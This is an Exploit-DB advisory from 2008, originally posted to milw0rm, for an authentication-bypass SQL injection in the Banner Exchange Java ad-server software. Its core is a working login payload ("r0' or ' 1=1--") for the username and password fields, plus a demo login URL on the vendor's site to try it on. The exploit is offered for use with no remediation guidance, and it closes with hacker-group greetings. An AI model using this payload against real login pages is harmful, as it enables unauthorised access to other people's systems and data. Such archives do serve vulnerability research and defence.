Banner Exchange Java - Authentication Bypass

EDB-ID:

7425

CVE:

2008-6364

EDB Verified:

Author:

R3d-D3V!L

Type:

webapps

Exploit: /

Platform:

ASP

Date:

2008-12-11

Vulnerable App:

[â˜¢] â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢{Ø¨Ø³Ù… Ø§Ù„Ù„Ù‡ Ø§Ù„Ø±ØÙ…Ù† Ø§Ù„Ø±ØÙŠÙ…}â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢

 [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
   
 [~]Vendor: www.adserversolutions.com
   
 [~]Software: Banner Exchange Java 
   
 [~]author: ((Ñ3d D3v!L))
   
 [~] Date: 28.11.2008
   
 [~] Home: www.ahacker.biz
   
 [~] contact: N/A

[~]â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ {R0}â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ 
   
 [~] Exploit:
   
 [~] username: r0' or ' 1=1--
 [~] password: r0' or ' 1=1--
   
   
 [â˜ ]login 4 d3m0:
   
  www.adservingsolutions.com/xchange_java/logon_license.jsp
 
 [~]-----------------------------{str0ke}---------------------------------------------------
 
  [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker & K374 & /\/\4/\/0/\/
  [~]
  [~] spechial thanks : dolly & 7am3m & EL z0hery & BLACK R053 &{str0ke}
  [~]
  [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
  [~]
  [~] xp10.biz & ahacker.biz
  [~]
 
 [~]--------------------------------------------------------------------------------

# milw0rm.com [2008-12-11]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services